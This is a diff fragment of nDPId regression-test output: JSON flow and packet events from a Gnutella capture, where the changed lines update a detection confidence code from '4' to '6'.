+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":88833,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":88897,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":88897,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4Ay4AAP8Bn8YKAAICCgACDwMBvHoAAAAARQAANFAnQAB\/BsDKCgACD3p1ZE7EYyMyoRe31g=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88941,"flow_last_seen":88941,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":88941,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":88941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":88941,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ccwAAIARC\/gKAAIPS4VlXXAJzI8AJKBHjeQxAkkpJRz\/KX356SYEAwABAAUAAADDglFLQA=="} @@ -760,71 +760,71 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":89733,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89733,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYFAAIAGGXcKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":89829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89829,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBGAAAIARhQ4KAAIPYEFEwnAJipkAWRiep7MxAim3LsYw33fFcko2zkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":89829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89829,"pkt":"UlQAEjUCCAAn5uVZCABFAABtYHgAAIARZpQKAAIPtVSyEHAJ62YAWWkRdMAxAjueygYrMQV+6lVI4UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":89829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89829,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDeAAAIARAL4KAAIPQh7dtXAJLuwAWQScCKYxAn7wSVwJearIKZuX\/UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":89964,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":89964,"pkt":"CAAn5uVZUlQAEjUCCABFAALzAzsAAEARw61gQUTCCgACD4qZcAkC3\/jzp7MxAim3LsYw33fFcko2zkQAAMACAAAGR1RLRwAAKfRYs\/Fa1CmeYJshGT65b9iJmmUEYEFEwoqZAQAAAARL51cQFEdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":89966,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89966,"pkt":"UlQAEjUCCAAn5uVZCABFAABthPwAAIARBkMKAAIPLVh12nAJGv0AWWOTCPExAoCeF40w0KwTJyzTOUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":89966,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89966,"pkt":"UlQAEjUCCAAn5uVZCABFAABteN4AAIAR6HgKAAIPM0SZ1nAJZo0AWRfF0U0xAgQATbK3Z+3BHrxn1kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89967,"flow_last_seen":89967,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":89967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89967,"pkt":"UlQAEjUCCAAn5uVZCABFAABtv\/sAAIAR2k0KAAIPucvaXHAJ3oIAWehILgsxAjPZohvFNPL\/fzMDzUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89967,"flow_last_seen":89967,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89967,"flow_last_seen":89967,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":90003,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90003,"pkt":"CAAn5uVZUlQAEjUCCABFAALzAzwAAEARm5UzRJnWCgACD2aNcAkC356C0U0xAgQATbK3Z+3BHrxn1kQAAMACAAAGR1RLRwAAP8uu0MEeyu8HazDjgCpjZAKtBhAEM0SZ1maNAQAAAAT9K4fbFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90004,"flow_last_seen":90004,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90004,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":90004,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90004,"pkt":"UlQAEjUCCAAn5uVZCABFAABtaUEAAIARBHsKAAIPSIx4KXAJunsAWfVM+10xAo9f69NRsDNb4\/pKE0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90004,"flow_last_seen":90004,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90004,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90004,"flow_last_seen":90004,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90004,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90005,"flow_last_seen":90005,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":28681,"dst_port":61616,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":90005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90005,"pkt":"UlQAEjUCCAAn5uVZCABFAABtgogAAIAR60AKAAIPwSX\/gnAJ8LAAWXkqrf0xAupVi8ylWZxhuwdOwkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 